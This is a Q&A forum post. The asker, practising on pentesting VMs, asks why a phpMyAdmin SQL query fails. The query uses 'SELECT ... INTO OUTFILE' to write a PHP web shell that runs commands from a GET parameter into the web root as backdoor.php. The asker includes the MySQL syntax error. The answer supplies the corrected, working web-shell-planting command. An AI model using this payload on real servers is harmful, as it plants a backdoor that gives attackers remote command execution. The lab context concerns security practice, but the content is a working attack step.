# php code injection in phpmyadmin

Tags: sql, phpmyadmin, code-injection

I'm toying with some pentesting VMs, and I'm trying a shell upload in phpmyadmin.
The tutorial, I'm trying to follow is http://www.hackingarticles.in/shell-uploading-web-server-phpmyadmin/

The question I have however is pure SQL - the command I'm trying to use:

```html
SELECT “<?php system($_GET[‘cmd’]); ?>” into outfile “C:\\xampp\\htdocs\\backdoor.php”
```

is producing the following error:

```html
Error

There seems to be an error in your SQL query. The MySQL server error output below, if there is any, may also help you in diagnosing the problem

ERROR: Unknown Punctuation String @ 9
STR: <?
SQL: SELECT “<?php system($_GET[‘cmd’]);SELECT “<?php system($_GET[‘cmd’]);SELECT “<?php system($_GET[‘cmd’]);


SQL query: Documentation

SELECT “<?php system($_GET[‘cmd’]);

MySQL said: Documentation
#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?php system($_GET[â€˜cmdâ€™])' at line 1
```

Any ideas how could I format it to be accepted?

Answer (score 0):

The quotes were copied dirty. Replace them after pasting the snippet:

```
SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php";
```